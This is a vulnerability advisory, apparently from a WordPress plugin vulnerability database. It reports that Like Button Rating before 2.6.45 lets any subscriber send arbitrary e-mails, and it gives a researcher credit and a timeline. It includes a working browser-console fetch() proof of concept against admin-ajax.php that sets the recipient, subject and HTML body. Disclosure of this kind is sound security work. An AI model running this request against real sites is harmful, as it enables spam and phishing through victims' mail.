WordPress Plugin Vulnerabilities
Like Button Rating < 2.6.45 - Arbitrary e-mail Sending
Description
The plugin allows any logged-in user, such as subscriber, to send arbitrary e-mails to any recipient, with any subject and body
Proof of Concept
As a subscriber, run the below command in the web developer console of the browser
fetch("/wp-admin/admin-ajax.php?action=likebtn_test_vote_notification", {
"headers": {
"content-type": "application/x-www-form-urlencoded",
},
"body": "options[likebtn_notify_to][email protected]&options[likebtn_notify_subject]=hehehe&options[likebtn_notify_text]=Hopsasa</b><h1>",
"method": "POST",
"credentials": "include"
})
.then(response => response.text())
.then(data => console.log(data)); Affects Plugins
Fixed in version 2.6.45
References
Classification
Miscellaneous
Original Researcher
Krzysztof Zając
Submitter
Krzysztof Zając
Submitter website
Verified
Yes
Timeline
Publicly Published
2022-05-23 (about 10 months ago)
Added
2022-05-23 (about 10 months ago)
Last Updated
2023-02-19 (about 1 months ago)